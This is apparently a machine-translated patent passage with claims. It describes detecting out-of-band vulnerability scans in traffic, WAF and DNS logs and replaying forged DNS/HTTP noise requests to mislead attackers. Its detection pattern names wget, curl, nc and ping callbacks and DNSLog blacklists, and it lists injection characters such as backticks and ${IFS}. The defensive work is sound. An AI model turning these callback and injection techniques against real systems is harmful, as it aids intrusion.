[0200] Here, if Figure 4 As shown, the BASH sandbox can restore the command line to construct an out-of-band request. By restoring the command line of the sandbox, the simulated execution result of the malicious request information can be obtained, and based on the simulated execution result of the sandbox, a second out-of-band request data can be constructed. This constructed second out-of-band request data will be similar to the attacker's scanning behavior, but the goal is to confuse its judgment and mislead the attacker to not find the real vulnerability.

[0201] In some embodiments, the sandbox environment includes a pseudo terminal module and a sub-process module, the pseudo terminal module is used to simulate terminal requests, and the sub-process module is used to simulate request operations.

[0202] Specifically, the sandbox environment includes a pseudo terminal module and a subprocess module. The pseudo terminal (pty) module and the subprocess module are used in combination to execute commands, thereby generating simulated execution results.

[0203] Pseudo terminal pty module: In the sandbox, a pseudo terminal is a virtual terminal device that simulates the behavior of a real terminal but does not rely on the actual physical device. Using the PTY module, a program can create a virtual terminal environment to simulate real user interaction. Subprocess module: The subprocess module simulates the requested operation behavior, performs possible malicious operations, or simulates the vulnerability exploitation process. These two modules work together to generate simulated execution results by simulating the attacker's behavior. In this way, agent requests in multiple languages ​​can be simulated to enhance credibility.

[0204] In some embodiments, the simulation execution result of the sandbox includes: a plurality of symbol fields, a domain name field, and a network address field, and based on the simulation execution result of the sandbox, constructing the second out-of-band request data includes:

[0205] Multiple symbol fields, preprocessed domain name fields, and preprocessed network address fields are concatenated to construct second out-of-band request data.

[0206] Here, in order to better and more realistically simulate the results of a successful attack and make the attacker or attack tool believe that the payload has been successfully executed and is effective, the domain name and network address need to be preprocessed, and the input data (such as domain name, IP address) that has been initially verified needs to be further preprocessed, that is, secondary processing.

[0207] It can be understood that splicing means combining multiple symbol fields with other information (such as domain name field, network address field) to generate a "forged" request packet. In this way, by splicing different fields, the generated forged request can look like a real out-of-band request, thereby misleading or preventing attackers from discovering vulnerabilities in the target system.

[0208] For example, assuming that the malicious request information is a malicious payload request, the specific steps of simulating the execution results for splicing are:

[0209] a) First, the noise injection module receives the malicious payload request and determines that it needs to enter the sandbox for execution.

[0210] b) Next, the payload is sent to a BASH container sandbox based on an isolated network cluster to execute the payload.

[0211] c) After the sandbox is executed, the result is returned to the noise injection module.

[0212] In some embodiments, the multiple symbol fields include: a backquote field, an exclamation point field, and a space field, and the multiple symbol fields, the preprocessed domain name field, and the preprocessed network address field are concatenated to construct the second out-of-band request data, including:

[0213] Based on the backquote field, the exclamation point field, the space field, the preprocessed domain name field and the preprocessed network address field, splicing is performed to construct the second out-of-band request data.

[0214] Understandably, the symbol field contains specific symbols such as backtick (`), exclamation mark (!), and space (). Attackers often use these symbols to evade detection or perform command injection when constructing malicious requests.

[0215] For example, assuming that the preprocessed domain name and network address are available, the backquote field, exclamation mark field, and space field are concatenated. The backquote (`) is used to embed commands into the request (HTTP request); the exclamation mark (!) is used as a delimiter for command separation; the space () may be used to separate different parameters or inject malicious code.

[0216] In some embodiments, in a hybrid cloud environment, playing back the second out-of-band request data includes:

[0217] In a hybrid cloud environment, based on multi-protocol simulation rules, the second out-of-band request data is replayed, the multi-protocol simulation rules include DNS protocol simulation rules and HTTP protocol simulation rules, and the second out-of-band request data includes constructed DNS request data or constructed HTTP request data.

[0218] It is understandable that if Figure 4 As shown, in a hybrid cloud environment, based on simulation rules supporting multiple protocols, it can be ensured that the forged out-of-band request can accurately simulate various communication behaviors in the real environment to replay the second out-of-band request.

[0219] Here, the second out-of-band request data includes constructed DNS request data or constructed HTTP request data. Attackers usually use DNS requests as a means of out-of-band scanning, and transmit sensitive data back to the server controlled by the attacker through DNS requests. By constructing DNS requests, the system can interfere with the attacker's detection process. The HTTP protocol is the most common request type in Web applications. Constructing HTTP requests can simulate the attacker's scanning behavior and further mislead their judgment.

[0220] For example, Figure 5 As shown, Figure 5 The diagram shows the network architecture in a hybrid cloud environment. The diagram contains the following key components: Region A and Region B: represent different cloud environments or data centers. Firewall: used to protect network boundaries, filter and control inbound and outbound traffic. WireGuard router: used to establish a secure network connection. Broadband 1 and Broadband 2: represent different network connection paths. Client router: used to connect client devices to the network.

[0221] exist Figure 5 In the hybrid cloud environment, forged out-of-band requests can be replayed through different network paths (such as Broadband 1 and Broadband 2) and security devices (such as firewalls and WireGuard routers). These out-of-band requests can be transmitted between different areas (such as Area A and Area B) to test the security and stability of the system.

[0222] Below, this application is described in detail with reference to an application example.

[0223] During the attack and defense confrontation, attackers will use vulnerability scanners to collect vulnerability information. They use out-of-band technologies such as DNSLog (domain name information stored on the DNS server) to confirm the authenticity of the vulnerability and the scope of its impact.

[0224] This application example provides an out-of-band vulnerability scanner interference method, which is to send noise traffic to confuse and interfere with the vulnerability scanner's vulnerability determination results, thereby hiding the vulnerability from external exposure and achieving the effect of active defense. This method is not only for scanners, but also can effectively interfere with the out-of-band behavior of RCE vulnerabilities of real attackers.

[0225] Traditional security devices usually use application firewalls (WAF) to defend against out-of-band scanners, relying on the WAF's header and body fields to match known out-of-band malicious domain names for interference.

[0226] The disadvantages of the prior art are:

[0227] 1. It is impossible to perform refined simulation based on the protocol content sent by the scanner. For example, the jdni request of the scanner to detect the log4j vulnerability, or the request of the fastjson vulnerability actually receives a dns request in the detection phase, while the products on the market mostly send http protocol requests, and the degree of simulation is low, which is easy to be discovered and blocked.

[0228] 2. Interference detection is usually implemented based on application layer firewalls, but the return DNSlog address hidden in UDP cannot be discovered based on application layer firewalls, which will naturally cause a large number of omissions.

[0229] 3. In terms of performance optimization, since the traditional interference deployment environment is based on a single-machine environment, a large number of queues are accumulated, which makes it impossible to complete the forged obfuscation requests in a timely and effective manner.

[0230] 4. The counter-request is played back in a single network environment and can be easily identified by the aggregation of access sources.

[0231] Here, the principle of out-of-band scanning is that if a vulnerability exists, the vulnerability echo data will be brought out through, for example, DNS requests or HTTP requests, and our interference method is to send interfered data to all scanning points.

[0232] Based on this principle, this application example designs a solution that automatically captures out-of-band vulnerability scanning requests and injects noise traffic to cause judgment confusion.

[0233] like Figure 2As shown in the figure, this application example includes an out-of-band request capture module, a message queue, and a noise injection module. The out-of-band request capture module is used to capture requests for vulnerability scanning using out-of-band technology from network traffic, web logs, and DNS logs. The out-of-band requests obtained by the out-of-band request capture module are input into the message queue, and the message queue transmits the out-of-band requests to the noise traffic injection module. The noise traffic injection module verifies the captured traffic, removes the internal white scanner, and then splices it based on the BASH sandbox command, and finally replays the constructed HTTP and DNS simulation requests in the hybrid cloud environment.

[0234] The out-of-band request module and the noise traffic injection module are introduced in detail below.

[0235] 1. Out-of-band request capture module.

[0236] like Figure 3 As shown, the out-of-band request capture module is used to capture requests for vulnerability scanning using out-of-band technology from network traffic (data source 1), web logs (data source 2) and DNS logs (data source 3).

[0237] First, log data from multiple data sources are parsed.

[0238] Data Source 1: Suricata.

[0239] Input: Traffic data monitored by the network interface. The specific example is shown in Table 1 above.

[0240] Output: URL data and domain data. The specific example is shown in Table 4 above.

[0241] Data source 2: WAF.

[0242] Input: web log, the specific example is shown in Figure 2 above;

[0243] Output: URL data. The specific example is shown in Table 5.

[0244] Data source 3: DNSLog. Extract DNS requests that meet the characteristics of DNSLog;

[0245] Input: DNS request, the specific example is shown in Table 3 above;

[0246] Output: domain data. The specific example is shown in Table 6.

[0247] Secondly, pattern request matching is performed based on the above output data, that is, out-of-band request matching such as Figure 3 shown.

[0248] 1. For suricata log and web log, first use the known pattern library (as shown below),

[0249] Method 1: Use network packet sending tools: wget / curl / nc / ping + protocol: http / dns + vulnerability detection object: url (ip) for pattern matching

[0250] Method 2: Use dnslog domain name blacklist for matching

[0251] 2. For dnslog, use the known dnslog domain name to match the blacklist domain name.

[0252] 2. Noise traffic injection module.

[0253] like Figure 4 As shown, the captured traffic is verified, the internal white scanner is removed, and then it is spliced ​​based on the BASH sandbox command. Finally, the constructed HTTP and DNS simulation requests are replayed in the hybrid cloud environment.

[0254] (1) Out-of-band request verification:

[0255] Input: Kafka message queue

[0256] For example, whenever new vulnerability domain name information is generated, the system pushes the information as a message to the Kafka message queue and generates consumption data. The format of the consumption data is shown in Table 7 below:

[0257] Table 7

[0258]

[0259] In the table above, the type field indicates the type of message data. The info field contains the specific information of the out-of-band request. In this example, "http: / / 1.2.3.4 / xxxx" is an example URL, indicating the target address of the HTTP request.

[0260] Output: Process incoming data into a standard format, eliminating the need for self-built out-of-band scanners to whitelist.

[0261] For example, as shown in Table 8 below:

[0262] Table 8

[0263]

[0264] Key steps: Verify the legality of the incoming data. After confirming the legality, compare the first-level domain name with the whitelist domain name list for filtering. After the screening is completed, proceed to the next step and send the data to the sandbox for command parsing.

[0265] (2) Out-of-band request construction.

[0266] Input: Input data after out-of-band request verification.

[0267] For example, as shown in Table 9 below:

[0268] Table 9

[0269]

[0270] Output: As shown in Table 10 below:

[0271] Table 10

[0272]

[0273] Key steps:

[0274] Parse the incoming domain name to determine whether BASH sandbox execution is required (use the pty module and subprocess module to execute commands), concatenate the results, usually pay attention to the backquote `, exclamation mark!, space ${IFS}, and perform secondary processing on the incoming domain name, IP and other information. Send it to the request construction module.

[0275] (3) Out-of-band request playback. Request playback is performed in a hybrid cloud environment, such as Figure 5 shown.

[0276] Input: out-of-band request body construction data;

[0277] For example, as shown in Table 11 below:

[0278] Table 11

[0279]

[0280] Output: DNS request body / HTTP request body.

[0281] For example, as shown in Table 12 below:

[0282] Table 12

[0283]

[0284] Pragma:no-cache

[0285] Cache-Control: no-cache

[0286] X-Requested-With:XMLHttpRequest

[0287] User-Agent:Mozilla / 5.0(Windows NT 10.0;

[0288] Win64;x64)AppleWebKit / 537.36(KHTML,like

[0289] Gecko)Chrome / 129.0.0.0Safari / 537.36Edg / 129.0.0.0

[0290] Content-Type:application / json

[0291] Therefore, this application example can achieve the following technical effects through the above solution:

[0292] 1) We consciously targeted RCE (Remote Code Execution, RCE) vulnerability attacks (manual), used vulnerability tools to detect behaviors, sent corresponding requests according to different protocols, and used container sandbox technology to isolate dangerous actions and send more realistic forged requests. We also simulated agent requests in multiple languages ​​to enhance credibility.

[0293] 2) The data source of this system is the full traffic record and big data analysis platform, which can obtain the payload return address in all protocols and interfere with it, effectively expanding the compatibility of the protocol and covering most of the enterprise's defense scenarios.

[0294] 3) Rich data sources: relying on cloud IDS data, honeypot cluster data, WAF real-time alarm data and PDNS data, it is possible to fully discover the out-of-band scanning behaviors faced by enterprise assets on the Internet.

[0295] In order to implement the method of the embodiment of the present application, the embodiment of the present application also provides a vulnerability defense device, which corresponds to the above-mentioned vulnerability defense method, and each step in the above-mentioned vulnerability defense method embodiment is also fully applicable to the present vulnerability defense device embodiment.

[0296] like Figure 6As shown, the vulnerability defense device 600 includes: an acquisition module 601, a capture module 602, a construction module 603 and a playback module 604. The acquisition module 601 is used to acquire request log data from multiple data sources, and the multiple data sources at least include: a network traffic data source, an application firewall log data source and a domain name system log data source; the capture module 602 is used to capture the first out-of-band request data in the request log data, and the first out-of-band request data represents the existence of out-of-band scanning behavior for vulnerabilities; the construction module 603 is used to construct the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue; the playback module 604 is used to play back the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

[0297] In some embodiments, the capture module 603 is further used to capture the first out-of-band request data in the request log data based on the pattern matching rule and the request log data; wherein the first out-of-band request data is the request log data that matches the pattern matching rule.

[0298] In some embodiments, the capture module 603 is also used to capture the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule if the request log data includes network traffic log data; wherein the first matching rule includes a pattern library, the pattern library includes network packet sending tool information, network protocol information and vulnerability detection object information; the second matching rule includes blacklist domain name data.

[0299] In some embodiments, the vulnerability defense device also includes a parsing module 605, which is used to parse the network traffic log data based on the first parsing rule to generate parsed network traffic data; the parsed network traffic data includes: a uniform resource locator and domain name information; the capture module 602 is also used to capture the first out-of-band request based on the uniform resource locator, the domain name information and the first matching rule or the second matching rule; wherein the first out-of-band request data is the network traffic log data that matches the first matching rule or the second matching rule.

[0300] In some embodiments, the capture module 602 is further used to capture the first out-of-band request data based on the application firewall log data, the second parsing rule and the first matching rule or the second matching rule if the request log data includes application firewall log data.

[0301] In some embodiments, the parsing module 605 is also used to parse the application firewall log data based on the second parsing rule to generate parsed application firewall log data; the parsed application firewall log data includes a uniform resource locator; the capture module 602 is also used to capture the first out-of-band request based on the uniform resource locator and the first matching rule or the second matching rule; wherein the first out-of-band request data is the application firewall log data that matches the first matching rule or the second matching rule.

[0302] In some embodiments, the capture module 602 is further configured to capture the first out-of-band request data based on the domain name system log data, the third parsing rule and the second matching rule if the log data is domain name system log data.

[0303] In some embodiments, the parsing module 605 is also used to parse the domain name system log data based on the third parsing rule to generate parsed domain name system log data, and the parsed domain name system log data includes domain name information; the capture module 602 is also used to capture the first out-of-band request data based on the domain name information and the second matching rule; the first out-of-band request data is the domain name system log data that matches the second matching rule.

[0304] In some embodiments, the vulnerability defense device further includes a verification module 606 for verifying whether the first out-of-band request data is legitimate; if so, constructing second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue.

[0305] In some embodiments, the verification module 606 is also used to determine whether the first-level domain name information of the malicious request information is in the whitelist if the first out-of-band request data is verified to be legal; if not, construct the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue.

[0306] In some embodiments, the vulnerability defense device also includes a sending module 607 for sending malicious request information to a sandbox environment; the acquisition module 601 is also used to obtain the simulated execution results for the malicious request information sent by the sandbox environment; the construction module 603 is also used to construct second out-of-band request data based on the simulated execution results of the sandbox.

[0307] In some embodiments, the construction module 603 is further used to concatenate multiple symbol fields, preprocessed domain name fields, and preprocessed network address fields to construct second out-of-band request data.

[0308] In some embodiments, the construction module 603 is further used to construct the second out-of-band request data by performing splicing based on the backquote field, the exclamation mark field, the space field, the preprocessed domain name field and the preprocessed network address field.

[0309] In some embodiments, the playback module 604 is also used to play back the second out-of-band request data in a hybrid cloud environment based on multi-protocol simulation rules, where the multi-protocol simulation rules include DNS protocol simulation rules and HTTP protocol simulation rules, and the second out-of-band request data includes constructed DNS request data or constructed HTTP request data.

[0310] In practical applications, the acquisition module 601, the capture module 602, the construction module 603, the playback module 604, the analysis module 605, the verification module 606 and the sending module 607 can be implemented by a processor in the vulnerability protection device. Of course, the processor needs to run the computer program in the memory to implement its functions.

[0311] It should be noted that: the vulnerability defense device provided in the above embodiment only uses the division of the above program modules as an example when performing vulnerability defense. In actual applications, the above processing can be assigned to different program modules as needed, that is, the internal structure of the device is divided into different program modules to complete all or part of the processing described above. In addition, the vulnerability defense device and the vulnerability defense method embodiment provided in the above embodiment belong to the same concept. The specific implementation process is detailed in the method embodiment and will not be repeated here.

[0312] Based on the hardware implementation of the above program modules and in order to implement the method of the embodiment of the present application, the embodiment of the present application also provides an electronic device. Figure 7 Only an exemplary structure of the electronic device is shown, not all structures, and it can be implemented as needed. Figure 7 Partial or complete structure shown. Figure 7 As shown, the electronic device 700 provided in the embodiment of the present application includes: at least one processor 701, a memory 702, a user interface 703 and at least one network interface 704. The various components in the electronic device 700 are coupled together through a bus system 705. It can be understood that the bus system 705 is used to realize the connection and communication between these components. In addition to the data bus, the bus system 705 also includes a power bus, a control bus and a status signal bus. However, for the sake of clarity, in Figure 7 Various buses are labeled as bus system 705.

[0313] The user interface 703 may include a display, a keyboard, a mouse, a trackball, a click wheel, keys, buttons, a touch pad or a touch screen.

[0314] The memory 702 in the embodiment of the present application is used to store various types of data to support the operation of the electronic device. Examples of such data include: any computer program used to operate on the electronic device.

[0315] The vulnerability defense method of the electronic device disclosed in the embodiment of the present application can be applied to the processor 701, or implemented by the processor 701. The processor 701 may be an integrated circuit chip with signal processing capabilities. In the implementation process, each step of the vulnerability defense method of the electronic device can be completed by the hardware integrated logic circuit or software instructions in the processor 701. The above-mentioned processor 701 can be a general-purpose processor, a digital signal processor (DSP, DigitalSignal Processor), or other programmable logic devices, discrete gates or transistor logic devices, discrete hardware components, etc. The processor 701 can implement or execute the various methods, steps and logic block diagrams disclosed in the embodiment of the present application. The general-purpose processor can be a microprocessor or any conventional processor, etc. In combination with the steps of the method disclosed in the embodiment of the present application, it can be directly embodied as a hardware decoding processor to execute, or it can be executed by a combination of hardware and software modules in the decoding processor. The software module can be located in a storage medium, which is located in the memory 702. The processor 701 reads the information in the memory 702 and completes the steps of the vulnerability defense method of the electronic device provided in the embodiment of the present application in combination with its hardware.

[0316] In an exemplary embodiment, the electronic device may be implemented by one or more application specific integrated circuits (ASIC), DSP, programmable logic device (PLD), complex programmable logic device (CPLD), field programmable gate array (FPGA), general processor, controller, microcontroller (MCU), microprocessor, or other electronic components to execute the aforementioned method.

[0317] It can be understood that the memory 702 can be a volatile memory or a non-volatile memory, and can also include both volatile and non-volatile memories. Among them, the non-volatile memory can be a read-only memory (ROM), a programmable read-only memory (PROM), an erasable programmable read-only memory (EPROM), an electrically erasable programmable read-only memory (EEPROM), a magnetic random access memory (FRAM), a flash memory, a magnetic surface memory, an optical disk, or a compact disc read-only memory (CD-ROM); the magnetic surface memory can be a disk memory or. The volatile memory can be a random access memory (RAM), which is used as an external cache. By way of example but not limitation, many forms of RAM are available, such as static random access memory (SRAM), synchronous static random access memory (SSRAM), dynamic random access memory (DRAM), synchronous dynamic random access memory (SDRAM), double data rate synchronous dynamic random access memory (DDRSDRAM), enhanced synchronous dynamic random access memory (ESDRAM), synchronous link dynamic random access memory (SLDRAM), direct memory bus random access memory (DRRAM). The memory described in the embodiments of the present application is intended to include but is not limited to these and any other suitable types of memory.

[0318] In an exemplary embodiment, the present application also provides a computer storage medium, which can be a computer-readable storage medium, on which a computer program is stored, and the computer program can be executed by a processor to complete the steps of the method of the present application. The computer-readable storage medium can be a memory such as ROM, PROM, EPROM, EEPROM, Flash Memory, magnetic surface storage, optical disk, or CD-ROM.

[0319] In an exemplary embodiment, the embodiment of the present application further provides a computer program product, including a computer program, and the above-mentioned computer program can be executed by the processor 701 of the electronic device to complete the steps of the method of the embodiment of the present application.

[0320] It should be noted that: "first", "second", etc. are used to distinguish similar objects, and are not necessarily used to describe a specific order or sequence.

[0321] In addition, the technical solutions described in the embodiments of the present application can be combined arbitrarily without conflict.

[0322] The above are only specific implementations of the present application, but the protection scope of the present application is not limited thereto. Any technician familiar with the technical field can easily think of changes or substitutions within the technical scope disclosed in the present application, which should be included in the protection scope of the present application. Therefore, the protection scope of the present application should be based on the protection scope of the claims.

Claims

1. A vulnerability defense method, characterized in that: include: Obtaining request log data from multiple data sources, the multiple data sources at least including: a network traffic data source, an application firewall log data source, and a domain name system log data source; Capturing first out-of-band request data in the request log data, where the first out-of-band request data indicates that there is an out-of-band scanning behavior for a vulnerability; constructing second out-of-band request data based on malicious request information of first out-of-band request data transmitted by the message queue; In a hybrid cloud environment, the second out-of-band request data is played back; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

2. The method according to claim 1, characterized in that The capturing of the first out-of-band request data in the request log data comprises: Based on the pattern matching rule and the request log data, capturing first out-of-band request data in the request log data; The first out-of-band request data is request log data that matches the pattern matching rule.

3. The method according to claim 2, characterized in that The pattern matching rule includes: a first matching rule and a second matching rule, and the capturing of the first out-of-band request data in the request log data based on the pattern matching rule and the request log data includes: If the request log data includes network traffic log data, capturing the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule; Among them, the first matching rule includes a pattern library, and the pattern library includes network packet sending tool information, network protocol information and vulnerability detection object information; the second matching rule includes blacklist domain name data.

4. The method according to claim 3, characterized in that The vulnerability detection object information includes uniform resource locator data or network address data, and the blacklist domain name data includes DNSLog domain name blacklist data.

5. The method according to claim 3, characterized in that: The capturing of the first out-of-band request data based on the network traffic log data, the first parsing rule and the first matching rule or the second matching rule comprises: Parsing the network traffic log data based on the first parsing rule to generate parsed network traffic data; the parsed network traffic data includes: uniform resource locator and domain name information; Based on the uniform resource locator, the domain name information and the first matching rule or the second matching rule, the first out-of-band request is captured; wherein the first out-of-band request data is network traffic log data that matches the first matching rule or the second matching rule.

6. The method according to claim 3, characterized in that: The method further comprises: If the request log data includes application firewall log data, the first out-of-band request data is captured based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule.

7. The method according to claim 6, characterized in that The capturing of the first out-of-band request data based on the application firewall log data, the second parsing rule, and the first matching rule or the second matching rule includes: Parsing the application firewall log data based on the second parsing rule to generate parsed application firewall log data; the parsed application firewall log data includes a uniform resource locator; Based on the uniform resource locator and the first matching rule or the second matching rule, the first out-of-band request is captured; wherein the first out-of-band request data is application firewall log data that matches the first matching rule or the second matching rule.

8. The method according to claim 3, characterized in that The method further comprises: If the log data is domain name system log data, the first out-of-band request data is captured based on the domain name system log data, the third parsing rule and the second matching rule.

9. The method according to claim 8, characterized in that The capturing of the first out-of-band request data based on the domain name system log data, the third parsing rule and the second matching rule comprises: Parsing the domain name system log data based on the third parsing rule to generate parsed domain name system log data, wherein the parsed domain name system log data includes domain name information; Based on the domain name information and the second matching rule, capturing the first out-of-band request data; The first out-of-band request data is domain name system log data that matches the second matching rule.

10. The method according to claim 1, characterized in that Before constructing the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue, the method further includes: Verify whether the first out-of-band request data is legal; if so, construct second out-of-band request data based on malicious request information of the first out-of-band request data transmitted by the message queue.

11. The method according to claim 10, characterized in that The method further comprises: If the first out-of-band request data is verified to be legal, determine whether the first-level domain name information of the malicious request information is in the whitelist; if not, construct the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue.

12. The method according to claim 1, characterized in that The method of constructing the second out-of-band request data based on the malicious request information of the first out-of-band request data transmitted by the message queue includes: Sending the malicious request information to a sandbox environment; Obtaining a simulation execution result for malicious request information sent by the sandbox environment; Based on the simulation execution result of the sandbox, the second out-of-band request data is constructed.

13. The method according to claim 12, characterized in that The sandbox environment includes a pseudo terminal module and a sub-process module, wherein the pseudo terminal module is used to simulate a terminal request, and the sub-process module is used to simulate a request operation.

14. The method according to claim 12, characterized in that The simulation execution result of the sandbox includes: a plurality of symbol fields, a domain name field and a network address field, and constructing the second out-of-band request data based on the simulation execution result of the sandbox includes: The multiple symbol fields, the preprocessed domain name field and the preprocessed network address field are concatenated to construct the second out-of-band request data.

15. The method according to claim 14, characterized in that The multiple symbol fields include: a backquote field, an exclamation point field, and a space field, and the multiple symbol fields, the preprocessed domain name field, and the preprocessed network address field are concatenated to construct the second out-of-band request data, including: Based on the backquote field, the exclamation point field, the space field, the preprocessed domain name field and the preprocessed network address field, splicing is performed to construct the second out-of-band request data.

16. The method according to claim 1, characterized in that The step of replaying the second out-of-band request data in the hybrid cloud environment includes: In the hybrid cloud environment, the second out-of-band request data is replayed based on multi-protocol simulation rules, the multi-protocol simulation rules include DNS protocol simulation rules and HTTP protocol simulation rules, and the second out-of-band request data includes constructed DNS request data or constructed HTTP request data.

17. A vulnerability protection device, characterized in that: The device also includes: An acquisition module, used to acquire request log data from multiple data sources, wherein the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source; A capture module, configured to capture first out-of-band request data in the request log data, wherein the first out-of-band request data indicates that there is an out-of-band scanning behavior for a vulnerability; A construction module, configured to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue; A playback module is used to play back the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

18. A vulnerability protection system, characterized in that: The system comprises: An out-of-band request capture module is used to obtain request log data from multiple data sources, wherein the multiple data sources include at least: a network traffic data source, an application firewall log data source, and a domain name system log data source; capture first out-of-band request data in the request log data, wherein the first out-of-band request data indicates the existence of out-of-band scanning behavior for vulnerabilities; A noise traffic injection module is used to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by a message queue; and to replay the second out-of-band request data in a hybrid cloud environment; wherein the hybrid cloud environment includes a public cloud environment and a private cloud environment.

19. The vulnerability defense system according to claim 18, characterized in that: The noise flow injection module includes: The request construction module is used to construct second out-of-band request data based on malicious request information of first out-of-band request data transmitted by the message queue.

20. An electronic device, characterized in that: include: A processor and a memory for storing a computer program that can be executed on the processor, wherein: The processor is used to execute the steps of the method according to any one of claims 1 to 16 when running a computer program.

21. A storage medium having a computer program stored thereon, characterized in that: When the computer program is executed by a processor, the steps of the method according to any one of claims 1 to 16 are implemented.

22. A computer program product comprising a computer program, characterized in that When the computer program is executed by a processor, the steps of the method according to any one of claims 1 to 16 are implemented.